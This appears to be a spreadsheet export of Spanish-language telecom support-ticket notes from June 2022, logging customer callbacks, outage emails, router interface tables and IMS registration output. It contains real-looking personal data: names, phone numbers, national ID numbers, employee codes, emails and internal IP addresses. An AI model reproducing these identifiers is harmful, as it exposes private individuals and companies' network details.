EN SEGUIMIENTO AL SERVICIO REPORTADO ID: 349400066T || DOLLARCITY GUATEMALA S.A. || 19 AV. 2-40 Z.3 QUETZALTENANGO C.C. UTZULEW MALL LOCAL 213.
LE COMENTO QUE SE ESTÁ COORDINANDO UNA VISITA TÉCNICA SEGÚN LO PLATICADO CON PERSONAL EN LA SUCURSAL SOLICITAN LA VISITA PARA EL DÍA VIERNES 24/06 POR LA MAÑANA YA QUE DEBEN GESTIONAR LOS ACCESOS EN EL CENTRO COMERCIAL.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN GARCIA 22106060 RESPONDE MIGUEL MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001853503</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 55124794  PERO NO RESPONDEN
-ID 1001853147</t>
  </si>
  <si>
    <t>F4612937</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE INDICA QUE NO PODIAN SACAR LLAMADAS, PERO EL YA NO ESTA EN TURNO SE ESTA COMUNICANDO CON EL PERSONAL DE LA AGENCIA PARA VER SI POSEEN ALGUN INCONVENIENTE.
1001757819
COLA:
NOMBRE: A: 32305171
NÚMERO: 011 50232305171
DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: +50232305171
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 18:33:20</t>
  </si>
  <si>
    <t>F4613001</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE CON LOS DATOS DE LOS TECNICOS.
BUENAS NOCHES ESTIMADO POR ESTE MEDIO COMPARTO LOS DATOS DE LOS TECNICOS ASIGNADOS
PARA LA VISITA TECNICA DEL DIA DE MAÑANA A PARTIR DE LAS 10:00AM.
EMPRESA
NOMBRE
ID
N° DE TELÉFONO EN SITIO
GEORED
CARLOS HUMBERTO MOLINA
1623-1983-00742
+504-3191-1430
GEORED
DARVIN ENRIQUE NORALES
0201-1987-01029
+504-3344-2796
QUEDO A LA ESPERA DE SU RESPUESTA.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OSCAR MARQUEZ PERO NO CONTESTA.
1001762381,1001762454
COLA:
NOMBRE: A: 0050433317166
NÚMERO: 0050433317166
DURACIÓN: 0:00:27
ESTADO: MARCANDO
DETALLES: 0050433317166
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 19:04:24</t>
  </si>
  <si>
    <t>F4613028</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 42940287 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001891349</t>
  </si>
  <si>
    <t>F4613089</t>
  </si>
  <si>
    <t>** SE CONSULTA CON PERSONAL DE CNOC VIA SKYPE SI SE CUENTA CON ALGO PENDIENTE CON CLIENTE, SI TODO OK, SE SOLICITA CIERRE PARA LA VALIDACION DE CC -*
-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77441319 MENCIONA QUE EL SERVICIO YA ESTA FUNCIONANDO CORRECTAMENTE PERO AYER EN LA TARDE NO TENIAN INTERNET
-ID 1001796863</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO AL 77441319 NO RESPONDE || SE INTENTARA LUEGO
-ID 1001789861
**</t>
  </si>
  <si>
    <t>F4613093</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA EL SEÑOR JOSE HERNANDEZ CONFIRMA SERVICIO OK Y AUTORIZA CIERRE DE TICKET **
-ID 1001780470
**</t>
  </si>
  <si>
    <t>F4613103</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 MENCIONA QUE EN ESTE MOMENTO YA TODO ESTA BIEN
CLIENTE SOLICITA LLAMDA PARA LAS 13:00 HRS VALIDAR EL FUNCIONAMIENTO
-ID 1001794050</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SERGIO BARRERA 56300178 MENCIONA QUE NO PUEDE INGRESAR A LA IP 190.56.17.56
CLIENTE MENCIONA QUE SE ESTAN TRATANDO DE CONECTAR A LA DIRECCION 96.125.164.146 PERO NO LES PERMITE
.-ID 1001790968</t>
  </si>
  <si>
    <t>F4613118</t>
  </si>
  <si>
    <t>+++SE LE ENVIA CORREO A CLIENTE///CON LA INFORMACION SOLICITADA//QUEDAMOS A LA ESPERA DE RESPUESTA
ELVYN ARIEL LOPEZ RECINOS
BUENA NOCHE ESTIMADO CLIENTE;
SU RED LAN DEBE DE IR CONECTADO EN LA INTERFAZ FASTETHERNET0, ENVIÓ EVIDENCIA DE CONFIGURACIÓN
SALUDOS</t>
  </si>
  <si>
    <t>F4613147</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODOLFO BRAVO AL 55550193 CONFIRMA SERVICIO ESTABLE Y OPERATIVO INDICA QUE FUE PROBLEMA DE ENERGIA **
-ID 1001788027
**</t>
  </si>
  <si>
    <t>F4613249</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 16:15
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; MONTIEL FLORES ERICK DANIEL &lt;EMONTIEL@UNINET.COM.MX&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; YAÑEZ FRAGA RODRIGO MARTIN &lt;RYFRAGA@UNINET.COM.MX&gt;
ASUNTO: RE: BIMBO INTERNACIONAL - GB BH COMAYAGUA - G74-M00003HN-HN0449F-NP-Q -LINK FLAPPING || IMBBL004351
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CLIENTE NO RESPONDE || SE INTENTARA LUEGO**
-ID 1001781955
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE SOLICITA PUEDA COMPARTIR POR CORREO LAS PRUEBAS
-ID 1001799379</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290  MENCIONA QUE YA OBSERVAN OPERATIVO EL SERVICIO
CLIENTE INDICA QUE SE PUEDE PROCEDER CON EL CIERRE CIERRE
-ID 1001966476</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001942994</t>
  </si>
  <si>
    <t>F4613323</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 03:53
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ICXN-00073OC ::: TICKET CNOC IMSOU000135 ::: FUERA DE SERVICIO
BUENOS DÍAS ESTIMADO SR. ESTRADA.
                ACTUALMENTE SE CUENTA CON EL TICKET SD1137917, PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO Y CON SALIDA A INTERNET DESDE EL CPE.
PODRÍA APOYARNOS EN VALIDAR NUEVAMENTE O REALIZANDO PRUEBAS CON LOS EQUIPOS INTERNOS.
INTERFACE                         IP ADDRESS/MASK      PHYSICAL   PROTOCOL
CELLULAR0/0/0                     UNASSIGNED           DOWN       DOWN
ETHERNET0/0/0                     UNASSIGNED           DOWN       DOWN
GIGABITETHERNET0/0/0              UNASSIGNED           UP         DOWN
GIGABITETHERNET0/0/0.950          10.201.39.58/30      UP         UP
GIGABITETHERNET0/0/0.951          10.201.40.42/30      UP         UP
GIGABITETHERNET0/0/1              190.149.152.253/30   UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           UP         DOWN
LOOPBACK5                         10.99.78.10/32       UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
&lt;SOUTHWEST AIRLINES COMPANY&gt;TRACERT -A 190.149.152.253  8.8.8.8
TRACEROUTE TO  8.8.8.8(8.8.8.8), MAX HOPS: 30 ,PACKET LENGTH: 40,PRESS CTRL_C TO BREAK
1 10.201.39.57 10 MS  10 MS  10 MS
2      *
3      *
4      *
5 62.115.173.202 &lt; AS=14754 &gt; 91 MS  90 MS  91 MS
6 80.239.128.35 &lt; AS=14754 &gt; 48 MS 62.115.154.67 &lt; AS=14754 &gt; 49 MS  49 MS
7 108.170.253.17 &lt; AS=14754 &gt; 49 MS 108.170.253.1 &lt; AS=14754 &gt; 51 MS  *
8 8.8.8.8 &lt; AS=14754 &gt; 49 MS 209.85.242.163 &lt; AS=14754 &gt; 49 MS 209.85.244.153 &lt; AS=14754 &gt; 49 MS
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: ESTRADA BUSTOS VICTOR MANUEL [MAILTO:VEBUSTOS@UNINET.COM.MX]
ENVIADO EL: JUEVES, 23 DE JUNIO DE 2022 03:46
PARA: BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ICXN-00073OC ::: TICKET CNOC IMSOU000135 ::: FUERA DE SERVICIO
+ GRUPO N1</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 MENCIONA QUE EL TICKET INTERNO YA LO TIENEN CERRADO
-ID 1001799379 -</t>
  </si>
  <si>
    <t>F4613442</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET **
-ID 1001783986
**</t>
  </si>
  <si>
    <t>F4613460</t>
  </si>
  <si>
    <t>***--- CL SOLICITA RFO FAVOR MOVER A ETAPA DE MONITOREO  YA SE SOLICITO EL MISMO  --**
DE: DICTAMENESCC [MAILTO:DICTAMENESCC@CLARO.COM.GT]
ENVIADO EL: MIÉRCOLES, 22 DE JUNIO DE 2022 13:30
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;
ASUNTO: RV: REPORTANDO | VISA * GUATEMALA * VISA-MULTIPLE-CID * CID 406487 &amp; 1015206 * DOWN * INC000003778646 * OPEN
BUENAS TARDES DICTÁMENES.
ES UN GUSTO SALUDARLES, SOLICITO DE SU APOYO CON LA ELABORACIÓN DE UN DICTAMEN TÉCNICO PARA EL SIGUIENTE TICKET.
SD1137288
802700073T
TELEFONICA INTERNACIONAL WHOLESALE SERVICES, S.L. - TIWS GT
DE ANTEMANO AGRADEZCO LA ATENCIÓN, A LA ESPERA DE SUS COMENTARIOS.
CUALQUIER CONSULTA O COMENTARIO A LA ORDEN.</t>
  </si>
  <si>
    <t>F4613472</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001946695</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA INDICA QUE YA VE OPERATIVO EL SERVICIO PERO QUE CONFIRMARA CON CLIENTE Y NOS RESPONDERA EL CORREO**
-ID 1001786139
**</t>
  </si>
  <si>
    <t>F4613497</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE SOLICITANDO LOS PERMISOS A LOS TECNICOS
DE: JOSE ARTURO CORADO JIMENEZ
ENVIADO: JUEVES, 23 DE JUNIO DE 2022 7:29
PARA: SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || OPERADORA DEL SUR S.A. DE C.V. || IP2170004SV || IZALCOBO. DOLORESAVENIDA MORAZANS/NY 3A.C.PTE.DESPENSA FAMILIAR
BUEN DÍA ESTIMADO CLIENTE
   BUENOS DÍAS, SU APOYO EN CONFIRMAR EL ACCESO PARA NUESTRO PERSONAL TÉCNICO, CON EL ID: IP2170004SV, UBICADO IZALCOBO. DOLORESAVENIDA MORAZANS/NY 3A.C.PTE.DESPENSA FAMILIAR
DUI CODIGO EMPLEADO
00354722-1 4378 RONAL MOREL CRESPIN
00157708-4 4690 ABRAHAM SAMUEL PEREZ
02726611-4 11288 FERNANDO LINARES
03245714-4 8787 ADAN ERNESTO GONZALEZ
01101266-2 4605 JOSE SALVADOR PORTILLO VELASQUEZ
01320096-0 9401 OSCAR RENE VIDES
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4613541</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE MARTINEZ 74657456 PARA VALIDAR PERO ENVIA A BUZON. SE LLAMA A JOSÉ RIVERA 74657447 QUIEN VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>INFORMA CLIENTE RENE MARTINEZ 74657456 QUE EL DÍA DE AYER POR FUERTES LLUVIAS SE CAYÓ UN ARBOL FRENTE A SUS INSTALACIONES REVENTANDO LA FIBRA DEL E1, SOLICITA VISITA TÉCNICA PARA LA REPARACIÓN. INDICA QUE NO ES NECESARIO TRAMITAR PERMISOS. ID: 1001780515</t>
  </si>
  <si>
    <t>F4613547</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RONALD MARROQUIN 61037799 MENCIONA QUE AUN ESTA PERSONAL TECNICO DE CLARO TRABAJANDO EN LA FO
-ID 1001948226</t>
  </si>
  <si>
    <t>**SE LLAMA A RONALD MARROQUIN 61037799 CLIENTE INFORMA QUE AUN ESTAN TRABAJANDO LOS TECNICOS **
-ID 1001942825
**</t>
  </si>
  <si>
    <t>F4613555</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  AL 4271-1068  CONTESTA LA SEÑORITA SHARON INDICA QUE YA REINICIO LOS EQUIPOS PERO NO LEVANTA SIGUE SIN INTERNET || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001830714
**</t>
  </si>
  <si>
    <t>F4613558</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MIGUEL ANGEL 85427535 MENCIONA QUE YA CUENTAN CON ENERGIA EN PR PERO PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001876769</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL ANGEL  85427535 INDICA QUE YA SE ENCUENTRA EN SITIO || SE LE SOLICITA UN MOMENTO PARA CONTACTAR A GESTOR PERO CORTA LLAMADA || SE INTENTARA LUEGO || SE NOTIFICA A GESTOR**
-ID 1001796840
**</t>
  </si>
  <si>
    <t>F4613568</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EMILIANO BARAONA AL 57622859 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001783118
**</t>
  </si>
  <si>
    <t>F4613583</t>
  </si>
  <si>
    <t>--- SE SOLICITA DE NUEVO APOYO A CNOC REACTIVO POR SKYPE. ...
...</t>
  </si>
  <si>
    <t>F4613586</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO VISITA PARA MAÑANA PRIMERA HORA || PENDIENTE CONFIRMEN
ASUNTO: VISITA TÉCNICA ID1057008SV || FUNDACION ARAGON SCHILDE EL SALVADOR || ZARAGOZA /LA LIBERTADCOL. EL ZAITECALLE PRINCIPAL
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO ID1057008SV || FUNDACION ARAGON SCHILDE EL SALVADOR || ZARAGOZA /LA LIBERTADCOL. EL ZAITECALLE PRINCIPAL346. LE COMENTO SE ESTÁ COORDINANDO UNA VISITA TÉCNICA AL SITIO PARA VERIFICAR EL ESTADO DE LOS EQUIPOS, SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO QUE ATENDERÁ VISITA EL DÍA DE MAÑANA A PRIMERA HORA.</t>
  </si>
  <si>
    <t>**SE LLAMA A PR 76493791 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 1001944007
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 76493791 NO RESPONDEN, ENVIA DIRECTO A BUZON
-ID 1001955786</t>
  </si>
  <si>
    <t>F4613613</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM ALEJO 61357262 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001914320</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE WILLIAM ALEJO 61357262 NOS ATIENDE UNA SRITA QUE NO QUIZO BRINDAR NOMBRE
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CN CLIENTE WILLIAM ALEJO 61357262 PARA REALIZAR PRUEBAS, PERO NO SE TIENE RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA SIN PROBLEMAS
##LLAMADA DESDE VIVO
REGISTRO EN IMS CORRECTO
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50323891800";
SMEJSVZ4_ZACAMIL_CSCF
+++    CSCF/*MEID:5 MENAME:SMEJSVZ4_ZACAMIL_CSCF*/        2022-06-23 09:24:00-06:00
O&amp;M    #1141410
%%/*1879206839 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50323891800";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50323891800@IMS.CLARO.COM.SV
                      IMPU  =  TEL:+50323891800
                SCU NUMBER  =  106
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  900
             RESIDUAL TIME  =  578
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@ZMLSCSCF01.IMS.CLARO.COM.SV;LR;DPT=7BD4_3714F246;CA=4948&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50323891800@10.223.202.37:5060;TRANSPORT=UDP;ANN=MSAN-ACCESS-2&gt;;Q=1.0
         ACCESS NETWORK ID  =  3
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  FIXED-SIP
       ORIGINAL IP ADDRESS  =  10.223.202.37
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50323891800";
SSSASVYN_ATLACATL_CSCF
+++    CSCF/*MEID:5 MENAME:SSSASVYN_ATLACATL_CSCF*/        2022-06-23 09:24:00-06:00
O&amp;M    #703746
%%/*1879141248 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50323891800";%%
RETCODE = 18460  THE USER DOES NOT EXIST.
---    END
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50323891800";
SMEJSVZ4_ZACAMIL_CSCF
+++    CSCF/*MEID:5 MENAME:SMEJSVZ4_ZACAMIL_CSCF*/        2022-06-23 09:24:05-06:00
O&amp;M    #1141412
%%/*1879206840 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50323891800";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50323891800@IMS.CLARO.COM.SV
               IMPU  =  TEL:+50323891800
         SCU NUMBER  =  106
     REGISTER STATE  =  REGISTERED
      REGISTER TIME  =  900
      RESIDUAL TIME  =  573
        PATH HEADER  =  &lt;SIP:TERM@ZMLPCSCF01.IMS.CLARO.COM.SV;LR;SSN;TYPE=V4;IP=10.223.202.37;PORT=5060;DPT=7BD2_86&gt;TRC=FFFFFFFF-FFFFFFFF&gt;
    CONTACT ADDRESS  =  &lt;SIP:+50323891800@10.223.202.37:5060;TRANSPORT=UDP;ANN=MSAN-ACCESS-2&gt;;Q=1.0
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  FIXED-SIP
USER PRIORITY LEVEL  =  4
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  ZMLPCSCF01.IMS.CLARO.COM.SV
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50323891800";
SSSASVYN_ATLACATL_CSCF
+++    CSCF/*MEID:5 MENAME:SSSASVYN_ATLACATL_CSCF*/        2022-06-23 09:24:05-06:00
O&amp;M    #703747
%%/*1879141249 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50323891800";%%
RETCODE = 18460  THE USER DOES NOT EXIST.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL DIA DE AYER REALIZARON PRUEBAS CON LA PBX PERO NO LES FUNCIONO, INDICA QUE HOY POR LA MAÑANA REINICIARON LA PBX Y LOS EQUIPOS DE CLARO PERO SIGUE SIN PODER REALIZAR LLAMADAS, SE LE COMENTA QUE A NIVEL DE UM LOS EQUIPOS ESTAN SINCRONIZADOS EL PROBLEMA RADICA QUE LA PBX PROBABLEMTNE ESTE LIBERANDO LAS LLAMADAS, CLIENTE SOLICITA QUE SE ENVIE PERSOANL TECNICO A CERTIFICAR EL SERVICIO Y QUE EL CONFIRME SI LA PBX TIENE EL DAÑO O NO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4613615</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARWIN GONZALEZ AL 50170059 NO RESPONDE | ENVIA A BUZON |
SE INTENTARA LUEGO**
-ID 1001801158
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARWIN GONZALEZ AL 50170059 INDICA QUE EL PROBLEMA ES QUE AL  REALIZA PING A GOOGLE LA LATENCIA SUBE Y BAJA CON EL PROVEEDOR SE REVISO INIDCA Y  ESTA A 10 PIE Y NECESITA QUE ESTE A 1000 | SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001817617
**</t>
  </si>
  <si>
    <t>F4613619</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDRES CASTILLO AL 506 22076230 INDICA QUE POR EL MOMENTO YA ESTA ESTABLE EL SERVICIO PERO QUE DE 7 A 8 FUE LA CAIDA Y QUIERE SABER LA CAUSA SE CONSULTA CON GESTOR INDICA QUE EN LOS LOGS NO SE OBSERVAN CAIDAS PERO CLIENTE BRINDA EL HOST CONTR0001519888OC  QUE ES EL PRINCIPAL INDICA PARA QUE SE REVISE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE  **
-ID 1001825264
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDRES CASTILLO AL 506 22076230 NO RESPONDE ENVIA A BUZON ||
 SE INTENTARA LUEGO**
-ID 1001803327
**</t>
  </si>
  <si>
    <t>F4613645</t>
  </si>
  <si>
    <t>SE HABLÓ CON ÁNGEL SANDOVAL/CLIENTE 51379767 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CC COMUNICAN A CLIENTE SR. JOSE LUIS SE LE SOLICITO VALIDAR SU EQUIPO, MENCIONAN QUE APLICARAN REINICIO SOLICITA REGRESAR LLAMADA A LAS 10:30 AM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGEL SANDOVAL AL 51379767  SOLICITA QUE SE LE LLAME EN 45 MIN YA QUE NO ESTA EN SITIO **
-ID 1001807050
**</t>
  </si>
  <si>
    <t>SE LLAMA A CL ANGEL SANDOVAL 51379767 INDICA QUE YA ESTA EN SITIO PARA REALIZAR PRUEBAS || SE NOTIFICA A GESTOR **
-ID 1001836736
**</t>
  </si>
  <si>
    <t>F4613658</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY GUEVARA AL 30192528 SOLICITA QUE SE LE LLAME EN 5 MIN **
-ID 1001808280
**</t>
  </si>
  <si>
    <t>F4613665</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENET TEJADA 42271739 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR
-ID 1001804918</t>
  </si>
  <si>
    <t>F4613670</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AXEL RECINOS 40138806 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001805915</t>
  </si>
  <si>
    <t>-* AXEL RECINOS 40138806 (CLIENTE) CONFIRMA CAMBIO, DE MOMENTO TODO OK, AUTORIZA CIERRE -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AXEL RECINOS 40138806 INDICA QUE SI SE LE PUEDE REALIZAR CONFIGURACION A LTE YA QUE ACTUALMENTE LO TIENE EN 3G || SE DEJA A CLIENTE EN LINEA CON GESTOR**
-ID 1001821263
**</t>
  </si>
  <si>
    <t>F4613677</t>
  </si>
  <si>
    <t>-*- DIEGO BRITO  (CLIENTE) INFORMA QUE EL SERVICIO AUN LO TIENEN CAIDO, LA CONEXION LA REALIZAN A LA IP 172.17.138.254 , SOLICITA SE PUEDA VALIDAR Y COMPARTIRLE LAS PRUEBAS DE OPERATIVIDAD AL CORREO NOCSE@MP.GOB.GT, SE SOLICITA APOYO A CNOC -*
-*</t>
  </si>
  <si>
    <t>-* BRYAN ALVIZUREZ 24119191 EXT. 10583 (CLIENTE) NO RESPONDE, SE LLAMARA LUEGO -*
1001863435
1001863928</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BRYAN ALVIZUREZ 24119191 EXT. 10583 NO RESPONDE SE INTENTARA LUEGO **
-ID 1001941052
**</t>
  </si>
  <si>
    <t>F4613694</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AGENTE CERITOS AL 23622134 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001866629
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE CERITOS 23622134 QUIEN APOYA REINICIANDO LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE
-ID 1001807480
NOMBRE DEL CLIENTE:POLICIA NACIONAL CIVIL
UBICACIÓN: SAN JUAN TEPEZONTES A LA PAR DE LA ALCALDIA MUNICIPAL. LA PAZ
CONTACTO EN SITIO: AGENTE DE TURNO
HORARIO DE ATENCION:24/7
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>SE HABLA CLIENTE ATIENDE AGENTE CERITOS CONFIRMA SERVICICO OPERATIVO
1001870417
NOMBRE: A: 50323622134
COLA:
NÚMERO: 50323622134
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50323622134
